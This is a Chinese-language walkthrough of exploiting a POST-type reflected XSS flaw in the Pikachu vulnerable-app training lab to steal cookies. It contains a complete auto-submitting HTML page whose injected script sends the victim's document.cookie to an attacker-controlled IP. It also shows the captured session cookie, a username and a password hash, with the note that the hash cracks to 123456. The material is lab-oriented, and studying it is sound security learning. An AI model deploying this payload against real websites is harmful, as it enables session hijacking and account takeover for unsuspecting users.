POST型XSS的利用:cookie获取
用户——>Request伪造页面,触发表单——>攻击者伪造表单自动提交页面(一个当用户访问这个就会触发js脚本窃取cookie信息给攻击者后台的链接)——>存在post型XSS漏洞的网站
伪造的自动提交页面的代码(在pikachu网站中可以搜索找到):
post.html:
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php">
<input id="xssr_in" type="text" name="message" value=
"<script>
document.location = 'http://192.168.10.130/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie; 这里的ip是后台接受cookie的主机
</script>"
/>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
192.168.43.229是我主机的IP地址,以下是我们构造用户访问的链接
http://192.168.43.229/pikachu/pkxss/xcookie/post.html
我们来到反射型xss-post,我们这里输入admin,123456登陆
现在用户是登陆状态,然后我们模拟用户访问了一个我们发送的post.html的链接(浏览器新建标签页)
然后页面重定向到了首页
我们再回到ip为:192.168.10.130的后台页面刷新
在这里可以看到获取到的cookie值:
ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=3vtjdj8v0c2p15437m56tsdqe3
其中uname,用户名是admin,pw是10470c3b4b1fed12c3baac014be15fac67c6e815,这一串使用md5解密后是123456。